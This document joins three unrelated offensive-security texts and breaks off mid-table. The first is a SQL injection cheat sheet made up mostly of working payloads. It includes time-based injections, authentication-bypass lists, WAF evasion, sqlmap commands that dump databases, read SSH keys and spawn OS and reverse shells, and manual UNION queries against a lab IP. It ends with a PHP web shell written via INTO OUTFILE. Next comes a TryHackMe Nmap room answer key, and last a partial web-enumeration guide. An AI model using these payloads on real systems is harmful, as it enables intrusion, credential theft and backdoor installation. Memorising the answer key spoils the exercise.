DELAY '0:0:10'-- ') WAITFOR DELAY '0:0:10'-- ') WAITFOR DELAY '0:0:10'-- '); WAITFOR DELAY '0:0:10'-- '); WAITFOR DELAY '0:0:10'-- ';) WAITFOR DELAY '0:0:10'-- ';) WAITFOR DELAY '0:0:10'-- ``` **PostgreSQL:** ``` '; SELECT pg_sleep(10)-- ') SELECT pg_sleep(10)-- '); dbms_pipe.receive_message(('a'),10)-- ';) dbms_pipe.receive_message(('a'),10)-- ``` **MySQL:** ``` '; SELECT sleep(10)--%20 ') SELECT sleep(10)--%20 '); SELECT sleep(10)--%20 ';) SELECT sleep(10)--%20 ``` ## DBMS Identification ```c ["conv('a',16,2)=conv('a',16,2)" ,"MYSQL"], ["connection_id()=connection_id()" ,"MYSQL"], ["crc32('MySQL')=crc32('MySQL')" ,"MYSQL"], ["BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)" ,"MSSQL"], ["@@CONNECTIONS>0" ,"MSSQL"], ["@@CONNECTIONS=@@CONNECTIONS" ,"MSSQL"], ["@@CPU_BUSY=@@CPU_BUSY" ,"MSSQL"], ["USER_ID(1)=USER_ID(1)" ,"MSSQL"], ["ROWNUM=ROWNUM" ,"ORACLE"], ["RAWTOHEX('AB')=RAWTOHEX('AB')" ,"ORACLE"], ["LNNVL(0=123)" ,"ORACLE"], ["5::int=5" ,"POSTGRESQL"], ["5::integer=5" ,"POSTGRESQL"], ["pg_client_encoding()=pg_client_encoding()" ,"POSTGRESQL"], ["get_current_ts_config()=get_current_ts_config()" ,"POSTGRESQL"], ["quote_literal(42.5)=quote_literal(42.5)" ,"POSTGRESQL"], ["current_database()=current_database()" ,"POSTGRESQL"], ["sqlite_version()=sqlite_version()" ,"SQLITE"], ["last_insert_rowid()>1" ,"SQLITE"], ["last_insert_rowid()=last_insert_rowid()" ,"SQLITE"], ["val(cvar(1))=1" ,"MSACCESS"], ["IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0" ,"MSACCESS"], ["cdbl(1)=cdbl(1)" ,"MSACCESS"], ["1337=1337", "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"], ["'i'='i'", "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"], ``` ## SQL injection using SQLmap ### Basic arguments for SQLmap ```powershell sqlmap --url="<url>" -p username --user-agent=SQLMAP --random-agent --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs ``` Testing a parameter with GET (mark with a "*" the parameter to test) ```powershell sqlmap.py -u "http://example.com/main.php?id=1*" --batch --banner ``` ```powershell sqlmap.py -u "http://example.com/main.php?id=1*" --batch --banner --dbs ``` More Basic Injection 01 ```powershell sqlmap -r <requestPOST>.txt ``` More Basic Injection 02 ```powershell sqlmap -r req01.txt --dbs ``` Basic Enumeration ```powershell sqlmap -r <requestPOST>.txt --risk=3 --level=5 --threads=10 ``` Get All Tables ```powershell sqlmap -r <requestPOST>.txt --risk=3 --level=5 --tables ``` Get Tables of a DB ```powershell sqlmap -r <requestGET>.txt --risk=3 --level=5 -D <database> --tables --threads=10 ``` Get Columns of a Table of a DB ```powershell sqlmap -r <requestPOST>.txt --risk=3 --level=5 -D <database> -T <tableName> --columns --threads 10 ``` Get ALL DATA of a Column ```powershell sqlmap -r <requestGET>.txt --risk=3 --level=5 -D <database> -T <table_name> -C <column_name> --dump --threads=10 ``` Read a File of System if you have permissions ```powershell sqlmap -r <requestPOST>.txt --file-read /home/dorthi/.ssh/id_rsa ``` User-Agent Bypass ```powershell sqlmap -u 'http://10.10.10.143/room.php?cod=1' --user-agent "<your_user_agent>" ``` ### Load a request file and use mobile user-agent ```powershell sqlmap -r sqli.req --safe-url=http://10.10.10.10/ --mobile --safe-freq=1 ``` ### Custom injection in UserAgent/Header/Referer/Cookie ```powershell python sqlmap.py -u "http://example.com" --data "username=admin&password=pass" --headers="x-forwarded-for:127.0.0.1*" The injection is located at the '*' ``` ### Second order injection ```powershell python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3 sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs ``` ### Shell ```powershell SQL Shell python sqlmap.py -u "http://example.com/?id=1" -p id --sql-shell Simple Shell python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell Dropping a reverse-shell / meterpreter python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn SSH Shell by dropping an SSH key python sqlmap.py -u "http://example.com/?id=1" -p id --file-write=/root/.ssh/id_rsa.pub --file-destination=/home/user/.ssh/ ``` ### Crawl a website with SQLmap and auto-exploit ```powershell sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3 --batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers --crawl = how deep you want to crawl a site --forms = Parse and test forms ``` ### Using TOR with SQLmap ```powershell sqlmap -u "http://www.target.com" --tor --tor-type=SOCKS5 --time-sec 11 --check-tor --level=5 --risk=3 --threads=5 ``` ### Using a proxy with SQLmap ```powershell sqlmap -u "http://www.target.com" --proxy="http://127.0.0.1:8080" ``` ### Using Chrome cookie and a Proxy ```powershell sqlmap -u "https://test.com/index.php?id=99" --load-cookie=/media/truecrypt1/TI/cookie.txt --proxy "http://127.0.0.1:8080" -f --time-sec 15 --level 3 ``` ### Using suffix to tamper the injection ```powershell python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- " ``` ### General tamper option and tamper's list ```powershell tamper=name_of_the_tamper ``` | Tamper | Description | | --- | --- | |0x2char.py | Replaces each (MySQL) 0x<hex> encoded string with equivalent CONCAT(CHAR(),…) counterpart | |apostrophemask.py | Replaces apostrophe character with its UTF-8 full width counterpart | |apostrophenullencode.py | Replaces apostrophe character with its illegal double unicode counterpart| |appendnullbyte.py | Appends encoded NULL byte character at the end of payload | |base64encode.py | Base64 all characters in a given payload | |between.py | Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' | |bluecoat.py | Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator | |chardoubleencode.py | Double url-encodes all characters in a given payload (not processing already encoded) | |charencode.py | URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %53%45%4C%45%43%54) | |charunicodeencode.py | Unicode-URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %u0053%u0045%u004C%u0045%u0043%u0054) | |charunicodeescape.py | Unicode-escapes non-encoded characters in a given payload (not processing already encoded) (e.g. SELECT -> \u0053\u0045\u004C\u0045\u0043\u0054) | |commalesslimit.py | Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'| |commalessmid.py | Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)'| |commentbeforeparentheses.py | Prepends (inline) comment before parentheses (e.g. ( -> /**/() | |concat2concatws.py | Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'| |charencode.py | Url-encodes all characters in a given payload (not processing already encoded) | |charunicodeencode.py | Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded) | |equaltolike.py | Replaces all occurrences of operator equal ('=') with operator 'LIKE' | |escapequotes.py | Slash escape quotes (' and ") | |greatest.py | Replaces greater than operator ('>') with 'GREATEST' counterpart | |halfversionedmorekeywords.py | Adds versioned MySQL comment before each keyword | |htmlencode.py | HTML encode (using code points) all non-alphanumeric characters (e.g. ‘ -> &#39;) | |ifnull2casewhenisnull.py | Replaces instances like ‘IFNULL(A, B)’ with ‘CASE WHEN ISNULL(A) THEN (B) ELSE (A) END’ counterpart| |ifnull2ifisnull.py | Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'| |informationschemacomment.py | Add an inline comment (/**/) to the end of all occurrences of (MySQL) “information_schema” identifier | |least.py | Replaces greater than operator (‘>’) with ‘LEAST’ counterpart | |lowercase.py | Replaces each keyword character with lower case value (e.g. SELECT -> select) | |modsecurityversioned.py | Embraces complete query with versioned comment | |modsecurityzeroversioned.py | Embraces complete query with zero-versioned comment | |multiplespaces.py | Adds multiple spaces around SQL keywords | |nonrecursivereplacement.py | Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters| |overlongutf8.py | Converts all characters in a given payload (not processing already encoded) | |overlongutf8more.py | Converts all characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. SELECT -> %C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94) | |percentage.py | Adds a percentage sign ('%') infront of each character | |plus2concat.py | Replaces plus operator (‘+’) with (MsSQL) function CONCAT() counterpart | |plus2fnconcat.py | Replaces plus operator (‘+’) with (MsSQL) ODBC function {fn CONCAT()} counterpart | |randomcase.py | Replaces each keyword character with random case value | |randomcomments.py | Add random comments to SQL keywords| |securesphere.py | Appends special crafted string | |sp_password.py | Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs | |space2comment.py | Replaces space character (' ') with comments | |space2dash.py | Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n') | |space2hash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') | |space2morehash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') | |space2mssqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters | |space2mssqlhash.py | Replaces space character (' ') with a pound character ('#') followed by a new line ('\n') | |space2mysqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters | |space2mysqldash.py | Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n') | |space2plus.py | Replaces space character (' ') with plus ('+') | |space2randomblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters | |symboliclogical.py | Replaces AND and OR logical operators with their symbolic counterparts (&& and ||) | |unionalltounion.py | Replaces UNION ALL SELECT with UNION SELECT | |unmagicquotes.py | Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) | |uppercase.py | Replaces each keyword character with upper case value 'INSERT'| |varnish.py | Append a HTTP header 'X-originating-IP' | |versionedkeywords.py | Encloses each non-function keyword with versioned MySQL comment | |versionedmorekeywords.py | Encloses each keyword with versioned MySQL comment | |xforwardedfor.py | Append a fake HTTP header 'X-Forwarded-For'| ### SQLmap without SQL injection You can use SQLmap to access a database via its port instead of a URL. ```ps1 sqlmap.py -d "mysql://user:pass@ip/database" --dump-all ``` ## Authentication bypass ```sql '-' ' ' '&' '^' '*' ' or 1=1 limit 1 -- -+ '="or' ' or ''-' ' or '' ' ' or ''&' ' or ''^' ' or ''*' '-||0' "-||0" "-" " " "&" "^" "*" '--' "--" '--' / "--" " or ""-" " or "" " " or ""&" " or ""^" " or ""*" or true-- " or true-- ' or true-- ") or true-- ') or true-- ' or 'x'='x ') or ('x')=('x ')) or (('x'))=(('x " or "x"="x ") or ("x")=("x ")) or (("x"))=(("x or 2 like 2 or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' -- - admin' # admin'/* admin' or '2' LIKE '1 admin' or 2 LIKE 2-- admin' or 2 LIKE 2# admin') or 2 LIKE 2# admin') or 2 LIKE 2-- admin') or ('2' LIKE '2 admin') or ('2' LIKE '2'# admin') or ('2' LIKE '2'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# admin') or ('1'='1'/* admin') or '1'='1 admin') or '1'='1'-- admin') or '1'='1'# admin') or '1'='1'/* 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 admin" -- admin';-- azer admin" # admin"/* admin" or "1"="1 admin" or "1"="1"-- admin" or "1"="1"# admin" or "1"="1"/* admin"or 1=1 or ""=" admin" or 1=1 admin" or 1=1-- admin" or 1=1# admin" or 1=1/* admin") or ("1"="1 admin") or ("1"="1"-- admin") or ("1"="1"# admin") or ("1"="1"/* admin") or "1"="1 admin") or "1"="1"-- admin") or "1"="1"# admin") or "1"="1"/* 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 administrator'-- OR 1=1 -- ' OR 2=2 -- ") OR 1=1 -- ') OR 1=1 -- admin== administrator== admin'- 'or''=' ' or 1=1 LIMIT 1 -- ' or 1=1 LIMIT 1 -- - ' or 1=1 LIMIT 1# 'or 1# ' or 1=1 -- ' or 1=1 -- - ' or 1=1# " OR "1"="1 ``` ## Authentication Bypass (Raw MD5 SHA1) When a raw md5 is used, the pass will be queried as a simple string, not a hexstring. ```php "SELECT * FROM admin WHERE pass = '".md5($password,true)."'" ``` Allowing an attacker to craft a string with a `true` statement such as `' or 'SOMETHING` ```php md5("ffifdyop", true) = 'or'6�]��!r,��b sha1("3fDf ", true) = Q�u'='�@�[�t�- o��_-! ``` Challenge demo available at [http://web.jarvisoj.com:32772](http://web.jarvisoj.com:32772) ## Polyglot injection (multicontext) ```sql SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/ /* MySQL only */ IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/ ``` ## Routed injection ```sql admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055' ``` ## Insert Statement - ON DUPLICATE KEY UPDATE ON DUPLICATE KEY UPDATE keywords is used to tell MySQL what to do when the application tries to insert a row that already exists in the table. We can use this to change the admin password by: ```sql Inject using payload: [email protected]", "bcrypt_hash_of_qwerty"), ("[email protected]", "bcrypt_hash_of_qwerty") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_qwerty" -- The query would look like this: INSERT INTO users (email, password) VALUES ("[email protected]", "bcrypt_hash_of_qwerty"), ("[email protected]", "bcrypt_hash_of_qwerty") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_qwerty" -- ", "bcrypt_hash_of_your_password_input"); This query will insert a row for the user “[email protected]”. It will also insert a row for the user “[email protected]”. Because this row already exists, the ON DUPLICATE KEY UPDATE keyword tells MySQL to update the `password` column of the already existing row to "bcrypt_hash_of_qwerty". After this, we can simply authenticate with “[email protected]” and the password “qwerty”! ``` ## WAF Bypass No Space (%20) - bypass using whitespace alternatives ```sql ?id=1%09and%091=1%09-- ?id=1%0Dand%0D1=1%0D-- ?id=1%0Cand%0C1=1%0C-- ?id=1%0Band%0B1=1%0B-- ?id=1%0Aand%0A1=1%0A-- ?id=1%A0and%A01=1%A0-- ``` No Whitespace - bypass using comments ```sql ?id=1/*comment*/and/**/1=1/**/-- ``` No Whitespace - bypass using parenthesis ```sql ?id=(1)and(1)=(1)-- ``` No Comma - bypass using OFFSET, FROM and JOIN ```sql LIMIT 0,1 -> LIMIT 1 OFFSET 0 SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1). SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d ``` No Equal - bypass using LIKE/NOT IN/IN/BETWEEN ```sql ?id=1 and substring(version(),1,1)like(5) ?id=1 and substring(version(),1,1)not in(4,3) ?id=1 and substring(version(),1,1)in(4,3) ?id=1 and substring(version(),1,1) between 3 and 4 ``` Blacklist using keywords - bypass using uppercase/lowercase ```sql ?id=1 AND 1=1# ?id=1 AnD 1=1# ?id=1 aNd 1=1# ``` Blacklist using keywords case insensitive - bypass using an equivalent operator ```sql AND -> && OR -> || = -> LIKE,REGEXP, BETWEEN, not < and not > > X -> not between 0 and X WHERE -> HAVING ``` Information_schema.tables Alternative ```sql select * from mysql.innodb_table_stats; +----------------+-----------------------+---------------------+--------+----------------------+--------------------------+ | database_name | table_name | last_update | n_rows | clustered_index_size | sum_of_other_index_sizes | +----------------+-----------------------+---------------------+--------+----------------------+--------------------------+ | dvwa | guestbook | 2017-01-19 21:02:57 | 0 | 1 | 0 | | dvwa | users | 2017-01-19 21:03:07 | 5 | 1 | 0 | ... +----------------+-----------------------+---------------------+--------+----------------------+--------------------------+ mysql> show tables in dvwa; +----------------+ | Tables_in_dvwa | +----------------+ | guestbook | | users | +----------------+ ``` Version Alternative ```sql mysql> select @@innodb_version; +------------------+ | @@innodb_version | +------------------+ | 5.6.31 | +------------------+ mysql> select @@version; +-------------------------+ | @@version | +-------------------------+ | 5.6.31-0ubuntu0.15.10.1 | +-------------------------+ mysql> mysql> select version(); +-------------------------+ | version() | +-------------------------+ | 5.6.31-0ubuntu0.15.10.1 | +-------------------------+ ``` ## Manual Exploitation ### Version ```powershell http://10.10.10.143/room.php?cod=0+union+select+1,2,version(),4,5,6,7-- ``` ### DB username ```powershell http://10.10.10.143/room.php?cod=-1+union+select+1,2,user(),4,5,6,7-- ``` ### DB name ```powershell http://10.10.10.143/room.php?cod=0+union+select+1,2,database(),4,5,6,7-- ``` ### See ALL DBs 1. First Method ```powershell http://10.10.10.143/room.php?cod=0+union+select+1,2,(select+group_concat(schema_name,":")+from+information_schema.schemata),4,5,6,7-- ``` 2. Second Method ```powershell http://10.10.10.143/room.php?cod=0+union+select+1,2,(select+group_concat(schema_name,":")+from+information_schema.schemata),4,5,6,7-- ``` ```powershell http://10.10.10.143/room.php?cod=0+union+select+1,2,schema_name,4,5,6,7+from+information_schema.schemata limit 0,1-- ``` ```powershell http://10.10.10.143/room.php?cod=0+union+select+1,2,schema_name,4,5,6,7+from+information_schema.schemata limit 1,1-- ``` ```powershell http://10.10.10.143/room.php?cod=0+union+select+1,2,schema_name,4,5,6,7+from+information_schema.schemata limit 2,1-- ``` ```powershell http://10.10.10.143/room.php?cod=0+union+select+1,2,schema_name,4,5,6,7+from+information_schema.schemata limit 3,1-- ``` ```powershell ... ... ... ``` ```powershell http://10.10.10.143/room.php?cod=0+union+select+1,2,schema_name,4,5,6,7+from+information_schema.schemata limit <n>,1-- ``` ### Tables of current DB ```powershell http://10.10.10.143/room.php?cod=0+union+select+1,2,(SELECT+group_concat(table_name)+from+information_schema.tables+where+table_schema=database()),4,5,6,7-- ``` ### Tables one by one of current DB ```powershell http://10.10.10.143/room.php?cod=0+union+select+1,2,table_name,4,5,6,7+from+information_schema.tables+where+table_schema=database()+limit+0,1--+ ``` ```powershell http://10.10.10.143/room.php?cod=0+union+select+1,2,table_name,4,5,6,7+from+information_schema.tables+where+table_schema=database()+limit+1,1--+ ``` ```powershell http://10.10.10.143/room.php?cod=0+union+select+1,2,table_name,4,5,6,7+from+information_schema.tables+where+table_schema=database()+limit+2,1--+ ``` ```powershell http://10.10.10.143/room.php?cod=0+union+select+1,2,table_name,4,5,6,7+from+information_schema.tables+where+table_schema=database()+limit+3,1--+ ``` ### See ALL Tables of a DB ```powershell http://10.10.10.143/room.php?cod=-1+union+select+1,2,(SELECT+group_concat(TABLE_NAME,":",COLUMN_NAME,"\r\n")+from+Information_Schema.COLUMNS+where+TABLE_SCHEMA+=+'<DB_NAME>'),4,5,6,7-- ``` ### Get the names of Columns under your Table ```powershell http://10.10.10.143/room.php?cod=0+union+select+1,2,column_name,4,5,6,7+from+information_schema.columns+where+table_schema=database()+and+table_name='tablenamehere'--+ ``` ```powershell http://10.10.10.143/room.php?cod=0+union+select+1,2,column_name,4,5,6,7+from+information_schema.columns+where+table_schema=database()+and+table_name='tablenamehere'+limit+0,1--+ ``` ```powershell http://10.10.10.143/room.php?cod=0+union+select+1,2,column_name,4,5,6,7+from+information_schema.columns+where+table_schema=database()+and+table_name='tablenamehere'+limit+1,1--+ ``` ```powershell http://10.10.10.143/room.php?cod=0+union+select+1,2,column_name,4,5,6,7+from+information_schema.columns+where+table_schema=database()+and+table_name='tablenamehere'+limit+2,1--+ ``` ```powershell http://10.10.10.143/room.php?cod=0+union+select+1,2,column_name,4,5,6,7+from+information_schema.columns+where+table_schema=database()+and+table_name='tablenamehere'+limit+3,1--+ ``` ### Extracting Data from the Columns ```powershell http://10.10.10.143/room.php?cod=0+union+select+1,2,concat(<column1>,<column2>),4,5,6,7+from+<tablename>+limit+0,1--+ ``` ```powershell http://10.10.10.143/room.php?cod=0+union+select+1,2,concat(<column1>,<column2>),4,5,6,7+from+<tablename>+limit+1,1--+ ``` ```powershell http://10.10.10.143/room.php?cod=0+union+select+1,2,concat(<column1>,<column2>),4,5,6,7+from+<tablename>+limit+2,1--+ ``` ```powershell http://10.10.10.143/room.php?cod=0+union+select+1,2,concat(<column1>,<column2>),4,5,6,7+from+<tablename>+limit+3,1--+ ``` ### List Password Hashes (from MySQL DB) ```powershell http://10.10.10.143/room.php?cod=-1+union+select+1,2,(SELECT+group_concat(host,":",user,":",password,"\r\n")+from+mysql.user),4,5,6,7-- ``` ### Read files from DB (Load File) ```powershell http://10.10.10.143/room.php?cod=0+union+select+1,2,load_file('/etc/passwd'),4,5,6,7-- ``` ```powershell http://10.10.10.143/room.php?cod=0+union+select+1,2,(TO_base64(LOAD_FILE("/var/www/html/<file.php>"))),4,5,6,7-- (in base64) ``` ### Upload php command injection file ```powershell union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php' ```
# Nmap - Deploy the attached VM no answer needed - What networking constructs are used to direct traffic to the right application on a server? - `ports` - How many of these are available on any network-enabled computer? - `65535` - [Research] How many of these are considered "well-known"? (These are the "standard" numbers mentioned in the task) - `1024` - What is the first switch listed in the help menu for a 'Syn Scan' (more on this later!)? - `-sS` - Which switch would you use for a "UDP scan"? - `-sU` - If you wanted to detect which operating system the target is running on, which switch would you use? - `-O` - Nmap provides a switch to detect the version of the services running on the target. What is this switch? - `-sV` - The default output provided by nmap often does not provide enough information for a pentester. How would you increase the verbosity? - `-v` - Verbosity level one is good, but verbosity level two is better! How would you set the verbosity level to two? (Note: it's highly advisable to always use at least this option) - `-vv` - We should always save the output of our scans -- this means that we only need to run the scan once (reducing network traffic and thus chance of detection), and gives us a reference to use when writing reports for clients. What switch would you use to save the nmap results in three major formats? - `-oA` - What switch would you use to save the nmap results in a "normal" format? - `-oN` - A very useful output format: how would you save results in a "grepable" format? - `-oG` - Sometimes the results we're getting just aren't enough. If we don't care about how loud we are, we can enable "aggressive" mode. This is a shorthand switch that activates service detection, operating system detection, a traceroute and common script scanning. How would you activate this setting? - `-A` - Nmap offers five levels of "timing" template. These are essentially used to increase the speed your scan runs at. Be careful though: higher speeds are noisier, and can incur errors! How would you set the timing template to level 5? - `-t5` - We can also choose which port(s) to scan. How would you tell nmap to only scan port 80? - `-p 80` - How would you tell nmap to scan ports 1000-1500? - `-p 1000-1500` - A very useful option that should not be ignored: How would you tell nmap to scan all ports? - `-p-` - How would you activate a script from the nmap scripting library (lots more on this later!)? - `--script` - How would you activate all of the scripts in the "vuln" category? - `--script=vuln` - Read the Scan Types Introduction. no answer needed - Which RFC defines the appropriate behaviour for the TCP protocol? - `RFC 793` - If a port is closed, which flag should the server send back to indicate this? - `rst` - There are two other names for a SYN scan, what are they? - `Half-open,stealth` - Can Nmap use a SYN scan without Sudo permissions (Y/N)? - `N` - If a UDP port doesn't respond to an Nmap scan, what will it be marked as? - `open|filtered` - When a UDP port is closed, by convention the target should send back a "port unreachable" message. Which protocol would it use to do so? - `icmp` - Which of the three shown scan types uses the URG flag? - `Xmas` - Why are NULL, FIN and Xmas scans generally used? - `firewall evasion` - Which common OS may respond to a NULL, FIN or Xmas scan with a RST for every port? - `Microsoft Windows` - How would you perform a ping sweep on the 172.16.x.x network (Netmask: 255.255.0.0) using Nmap? (CIDR notation) - `nmap -sn 172.16.0.0/16` - What language are NSE scripts written in? - `Lua` - Which category of scripts would be a very bad idea to run in a production environment? - `intrusive` - What optional argument can the ftp-anon.nse script take? - `maxlist` - Search for "smb" scripts in the /usr/share/nmap/scripts/ directory using either of the demonstrated methods. What is the filename of the script which determines the underlying OS of the SMB server? - `ls -lah | grep smb` - `smb-os-discovery.nse` - Read through this script. What does it depend on? - `cat smb-os-discovery.nse`, see the line `dependencies = {"smb-brute"}` - `smb-brute` - Which simple (and frequently relied upon) protocol is often blocked, requiring the use of the -Pn switch? - `icmp` - [Research] Which Nmap switch allows you to append an arbitrary length of random data to the end of packets? - `--data-length` - Does the target (<TARGET_IP>) respond to ICMP (ping) requests (Y/N)? - `N` - Perform an Xmas scan on the first 999 ports of the target -- how many ports are shown to be open or filtered? - `sudo nmap -sX -vv -Pn -p -999 <TARGET_IP>` - `999` - There is a reason given for this -- what is it? Note: The answer will be in your scan results. Think carefully about which switches to use -- and read the hint before asking for help! - `no responses` - Perform a TCP SYN scan on the first 10000 ports of the target -- how many ports are shown to be open? - `sudo nmap -sS -Pn -vv -p -10000 <TARGET_IP>` - `5` - Open Wireshark and perform a TCP Connect scan against port 80 on the target, monitoring the results. Make sure you understand what's going on. no answer needed - Deploy the ftp-anon script against the box. Can Nmap login successfully to the FTP server on port 21? (Y/N) - `Y` - Read the conclusion. no answer needed
## Web Enumeration Web enumeration means to look out info about services running on port, versions, languages, directories and more. - [Web Enumeration](#web-enumeration) - [Ports](#ports) - [nmap](#nmap) - [Finding Open Ports](#finding-open-ports) - [Checking Running Service Version](#check-running-service-version) - [Nmap Scripts](#obtaining-information-using-nmap-scripts) - [Directory Searching](#directory-searching) - [DirSearch](#dirsearch) - [Gobuster](#gobuster) - [HTTP Method](#http-method) - [Available Methods](#detecting-available-methods) - [Upload File](#upload-file) - [Tools](#tools) - [netcat](#netcat) - [curl](#curl) - [nikto](#nikto) - [davtest](#davtest) - [cadaver](#cadaver) - [HTTP Basic Authentication](#http-basic-authentication) - [Tools](#tools) - [hydra](#hydra) - [ncrak](#ncrack) - [medusa](#medusa) - [Shellshock Vulnerability](#shellshock-vulnerability) - [Identifying Shellshock Vulnerability](#identifying-shellshock-vulnerability) - [curl](#curl-1) - [nmap](#nmap-1) - [Exploiting Shellshock Vulnerability](#exploiting-shellshock-vulnerability) - [curl](#curl-2) - [Shellshock Python Exploit](#shellshock-python-exploit) ## ports. | Service | Port No. | Protocol | |---------|----------|----------| | HTTP | 80,8080,8081,8000 | TCP | | HTTPS | 443,8443,4443 | TCP | | Tomcat Startup | 8080 | TCP | | Tomcat Startup (SSL) | 8443 | TCP | | Tomcat Shutdown | 8005 | TCP | | Tomcat AJP Connector | 8009 | TCP | | Glassfish HTTP | 8080 | TCP | | Glassfish HTTPS | 8181 | TCP | | Glassfish Admin Server | 4848 | TCP | | Jetty | 8080 | TCP | | Jonas Admin Console | 9000 | TCP | ## nmap -Pn: Treat all hosts as online -- skip host discovery -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans -p <port ranges>: Only scan specified ports -sV: Probe open ports to determine service/version info -sC: equivalent to --script=default --script=<Lua scripts>: <Lua scripts> is a comma separated list of directories, script-files or script-categories -O: Enable OS detection -oA <basename>: Output in the three major formats at once -v: Increase verbosity level (use -vv or more for greater effect) -A: Enable OS detection, version detection, script scanning, and traceroute ## Finding Open Ports # nmap -sT -v -p- $IP # nmap -sT -v -p- -oA allports $IP ##Save Output in File # nmap -Pn -sT -v -p- $IP ## Check Running Service Version # nmap -sT -sV -sC -A -O -v -p 80,443 $IP # nmap -Pn -sT -sV -sC -A -O -v -p 80,443 $IP ## Obtaining Information using nmap Scripts # ls /usr/share/nmap/scripts/ | grep http # nmap -sT -sV -v -p 80,443 --script=http-enum.nse $IP # nmap -sT -sV -v -p 80,443 --script=http-php-version.nse $IP # nmap -sT -sV -v -p 80,443 --script=http-put.nse $IP # nmap -sT -sV -v -p 80,443 --script=http-shellshock.nse $IP # nmap -sT -sV -v -p 80,443 --script=http-slowloris.nse $IP # nmap -sT -sV -v -p 80,443 --script=http-vhosts.nse $IP ## Directory Searching ## Tools ### Dirsearch Diresearch is an advanced tool to Bruteforce directory on your web machines. # dirsearch -u http://www.example.com/ # dirsearch -u http://www.example.com/ -t 100 # dirsearch -u http://www.example.com/ -t 100 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt # dirsearch -u http://www.example.com/ -t 100 -e “php,html,aspx,jsp” -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt # dirsearch -u http://www.example.com/ -o result.txt -u - Target-Url -t - Number of threads -w - Denotes the path of directory list -e - Extensions ( php,jsp,bak,html,png,jpeg ) -o - Output file ### Gobuster # gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://www.example.com # gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://www.example.com -t 50 # gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://www.example.com -x php,txt,bak # gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://www.example.com -o /tmp/result.txt -u - Target-Url -w - Denotes the path of directory list -t - Number of threads -x - Extensions ( php,jsp,bak,html,png,jpeg ) -o - Output file You can also find sub-domains with gobuster # gobuster vhost -u http://example.name -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt ## HTTP Method | Method | Syntax | Description | |--------|--------|-------------| | GET | GET /index.html |GET method requests a representation of the specified resource. Requests using GET should only retrieve data. | | HEAD | HEAD /index.html |HEAD method requests the headers that would be returned if the HEAD request's URL was instead requested with the HTTP GET method. | | POST | POST /test |POST method is used to submit an entity to the specified resource, often causing a change in state or side effects on the server. | | PUT | PUT /new.html 